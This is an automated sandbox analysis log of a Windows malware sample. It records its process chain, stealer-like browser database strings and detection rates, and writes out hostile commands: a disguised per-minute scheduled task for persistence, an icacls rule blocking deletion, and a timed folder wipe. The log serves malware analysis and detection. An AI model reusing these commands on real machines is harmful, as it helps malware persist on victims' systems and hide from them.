            Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
            Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
            Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
            Source: build2.exe, 00000013.00000003.2340668890.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
            Source: file.exeReversingLabs: Detection: 31%
            Source: file.exeVirustotal: Detection: 43%
            Source: E609.exeString found in binary or memory: set-addPolicy
            Source: E609.exeString found in binary or memory: id-cmc-addExtensions
            Source: E609.exeString found in binary or memory: set-addPolicy
            Source: E609.exeString found in binary or memory: id-cmc-addExtensions
            Source: E609.exeString found in binary or memory: set-addPolicy
            Source: E609.exeString found in binary or memory: id-cmc-addExtensions
            Source: E609.exeString found in binary or memory: id-cmc-addExtensions
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\rujtcgu C:\Users\user\AppData\Roaming\rujtcgu
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C002.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exe
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exe
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230" /deny *S-1-1-0:(OI)(CI)(DE,DC)
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Users\user\AppData\Local\Temp\E609.exe "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Users\user\AppData\Local\Temp\E609.exe "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeProcess created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeProcess created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C01.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeProcess created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeProcess created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeProcess created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\rujtcgu C:\Users\user\AppData\Roaming\rujtcgu
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 10876
            Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIJEBGDAFHI" & exit
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C002.bat" "Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStartJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStartJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Users\user\AppData\Local\Temp\E609.exe "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeProcess created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeProcess created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIJEBGDAFHI" & exit
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeProcess created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeProcess created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeProcess created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguSection loaded: msvcr100.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: drprov.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: ntlanman.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: davclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: davhlpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: browcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: mswsock.dll
